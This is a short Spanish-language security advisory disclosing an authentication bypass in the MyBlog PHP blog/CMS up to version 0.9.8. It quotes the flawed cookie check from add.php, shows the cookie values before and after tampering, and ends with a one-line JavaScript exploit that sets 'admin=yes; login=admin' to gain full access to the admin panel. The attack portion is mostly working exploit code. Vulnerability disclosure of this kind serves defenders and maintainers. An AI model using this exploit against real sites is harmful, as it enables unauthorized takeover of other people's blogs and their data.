-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
MyBlog <= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Programa: MyBlog
$ Ficheros afectados: todos los de /admin/*.php 
$ Version: 0.9.8
$ Download: http://sourceforge.net/projects/myblog/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

MyBlog es un proyecto Blog/CMS de codigo abierto. Permite a los principiantes
tener un sencillo blog/cms con posibilidad de aņadir plugins, temas y modulos.


Puedes alterar las cookies para obtener privilegios de administrador.


Codigo de add.php:

<?php 
if(isset($_COOKIE['admin']) OR isset($_COOKIE['post'])) {
	$name = $_COOKIE['login']; 
}
else {
echo "Please Login";
	exit;
}
?>

Si intentas entrar en http://blog/admin obtienes: 'Please Login' y la cookie
queda similar a esto:

login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926

Pero si cambias la cookie y pones, por ejemplo:

admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926

Entonces obtienes acceso complet oal panel de administracion.

Exploit:
javascript:document.cookie = "admin=yes; login=admin";